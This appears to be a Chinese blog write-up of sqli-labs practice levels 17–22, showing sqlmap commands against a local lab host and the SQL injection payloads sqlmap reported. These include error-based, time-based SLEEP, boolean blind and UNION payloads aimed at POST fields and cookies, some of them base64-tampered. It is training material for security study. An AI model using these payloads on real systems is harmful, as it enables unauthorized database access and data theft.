文章目录
- 17、less17-Update Query- Error based - String
- 18、less18-Header Injection- Error Based- string
- 19、less19- Header Injection- Referer- Error Based- string
- 20、less20-COOKIE Injection- Error Based- string
- 21、less21-COOKIE Injection- Error Based- complex - string
- 22、less22-COOKIE Injection- Error Based- Double Quotes
17、less17-Update Query- Error based - String
在这一关中,uname参数经过了check_in()函数过滤,因此如果我们直接按照之前的进行过滤的话就会发现sqlmap很有可能会跑很久,这是因为uname不可注入,因此sqlmap就尝试这一切方法对他进行注入,所以时间花费很长。但是另外一个参数passwd并没有进行过滤,我们进行注入时就要指定参数。
本关同于第11关,具体语句不一一赘述了。
下面为sqlmap给出的payload:
C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 -p "passwd"
tips:最开始跑的时候发现跑不出来,在手工注入的时候发现是参数uname需要时存在的用户,否则无论passwd输入什么都是产生报错,因此uname需要是正确的,pass可以随意。如下图:
下面为sqlmap给出的paylaod:
sqlmap identified the following injection point(s) with a total of 1766 HTTP(s) requests:
Parameter: passwd (POST)Type: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin&passwd=11' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170766271,(SELECT (ELT(6944=6944,1))),0x717a7a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- AKXd&submit=SubmitType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin&passwd=11' AND (SELECT 7917 FROM (SELECT(SLEEP(5)))uuIs)
下面18-20主要是关于http头部的注入。
关于详细的http头部介绍可以参考我的另外一篇文章链接:
https://blog.csdn.net/weixin_43901038/article/details/107640730
虽然文章中讲到了http头部的很多信息,但是长啊激动呢http注入点产生的位置如下:
referer、X-Forwarded-For、COOKIE、X-Real-IP、Accept-Language、Authorization
下面几篇有点尴尬,啥方法也都试了,就是跑不出来,我也不知道问题出在了那里,关于具体的参考方法请看下面的链接吧,这个等之后我有思路的时候再来进行补充!
对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)
18、less18-Header Injection- Error Based- string
本关对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的。但是在代码中,我们看到了insert()
insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′uagent', 'IP′,uname)";
将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?
我们可以尝试一下。
额,我用 --level=5 --risk=3 把这个跑了一遍,事实就是,,,,跑了将近半个小时怎么都没有结果。
额,很好,我放弃了,,,,,下次再战!!!
19、less19- Header Injection- Referer- Error Based- string
20、less20-COOKIE Injection- Error Based- string
从源代码中我们可以看到COOKIE从username中获得值后,当再次刷新时,会从COOKIE中读取username,然后进行查询。
在这一关我们主要是对COOKIE进行注入,因此我们需要使用的参数 - - COOKIE 进行注入。
以下为本关的注入语句:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-20/" --COOKIE "uname=admin" --level=3
以下为sqlmap给出的paylaod:
sqlmap identified the following injection point(s) with a total of 2589 HTTP(s) requests:
Parameter: uname (COOKIE)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: uname=admin' AND 2481=2481-- QeIxType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178706a71,(SELECT (ELT(1349=1349,1))),0x717a6b7a71,0x78))s), 8446744073709551610, 8446744073709551610)))Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin' AND (SELECT 7130 FROM (SELECT(SLEEP(5)))Wpnx)-- sDNUType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: uname=-2470' UNION ALL SELECT CONCAT(0x7178706a71,0x7668714d64484c644a426d63435446537a65435a494a505a5a527a415572564a4a66575a72465375,0x717a6b7a71),NULL,NULL
21、less21-COOKIE Injection- Error Based- complex - string
本关与第20关是类似的,但是本关对base64进行了编码。因此我们可以利用参数 - - tamper=base64encode 加载base64编码注入。
注入语句如下:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-21/" --COOKIE "uname=admin" --level=3 --tamper=base64encode
以下为sqlmap注入给出的payload:
sqlmap identified the following injection point(s) with a total of 2622 HTTP(s) requests:
Parameter: uname (COOKIE)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: uname=admin') AND 5812=5812 AND ('DZPG' LIKE 'DZPGType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(1502=1502,1))),0x7171767871,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('kEGe' LIKE 'kEGeType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin') AND (SELECT 8779 FROM (SELECT(SLEEP(5)))DSbJ) AND ('hRvK' LIKE 'hRvKType: UNION queryTitle: Generic UNION query (random number) - 3 columnsPayload: uname=-4185') UNION ALL SELECT 8255,CONCAT(0x7176787171,0x614e724f4e4b685754644d6575435249534b4d6e7a794e47637171466756557a4f58666a6e6d7346,0x7171767871),8255
22、less22-COOKIE Injection- Error Based- Double Quotes
本关类似于第21关,只是在COOKIE前面加上了双引号。
如下为sqlmap的注入语句:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-22/" --COOKIE "uname=admin" --level=3 --tamper=base64encode
以下为sqlmap注入给出的payload:
sqlmap identified the following injection point(s) with a total of 2629 HTTP(s) requests:
Parameter: uname (COOKIE)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: uname=admin" AND 5788=5788 AND "ZhRs"="ZhRsType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162716a71,(SELECT (ELT(5835=5835,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND "qffh"="qffhType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin" AND (SELECT 4753 FROM (SELECT(SLEEP(5)))zEdp) AND "wZxo"="wZxoType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: uname=-5156" UNION ALL SELECT NULL,CONCAT(0x7162716a71,0x73784a556468644e6d496c6a4d465573765670476174454c77754c6b6b42776f6c676e58736a6f7a,0x71766a7671),NULL
京公网安备 11010802041100号